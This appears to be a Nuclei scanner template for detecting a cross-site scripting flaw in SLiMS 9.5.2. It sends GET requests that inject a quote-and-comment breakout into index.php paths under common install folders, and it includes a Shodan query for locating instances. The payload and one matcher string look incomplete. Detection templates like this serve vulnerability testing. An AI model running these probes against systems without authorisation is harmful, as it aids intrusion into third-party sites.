id: slims-9-xss-index info: name: Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting author: nblirwn severity: medium description: | SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly reference: - https://github.com/slims/slims9_bulian/issues/185 metadata: verified: true max-request: 8 vendor: slims product: senayan_library_management_system shodan-query: html:'content="SLIMS' tags: senayan,xss,slims http: - method: GET path: - "{{BaseURL}}/index.php/%22--%3E/index.php" - "{{BaseURL}}/perpustakaan/index.php/%22--%3E/index.php" - "{{BaseURL}}/slims/index.php/%22--%3E/index.php" - "{{BaseURL}}/perpustakaan/slims/index.php/%22--%3E/index.php" - "{{BaseURL}}/e-library/index.php/%22--%3E/index.php" - "{{BaseURL}}/perpus/index.php/%22--%3E/index.php" - "{{BaseURL}}/digilib/index.php/%22--%3E/index.php" - "{{BaseURL}}/bulian/index.php/%22--%3E/index.php" - "{{BaseURL}}/library/index.php/%22--%3E/index.php" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - '' - 'SLiMS' - 'name="author' condition: and - type: word part: content_type words: - "text/html" - type: status status: - 200 # digest: 4a0a004730450220440c27c9dac1b747c7fd8b99274c82bf1c5c744e630964e6cae3b91391e8ad02022100cc42a1987efdf5140ba603410d27db5284bae3cd93de221a5dc1a426ae6ad000:922c64590222798bb761d5b6d8e72950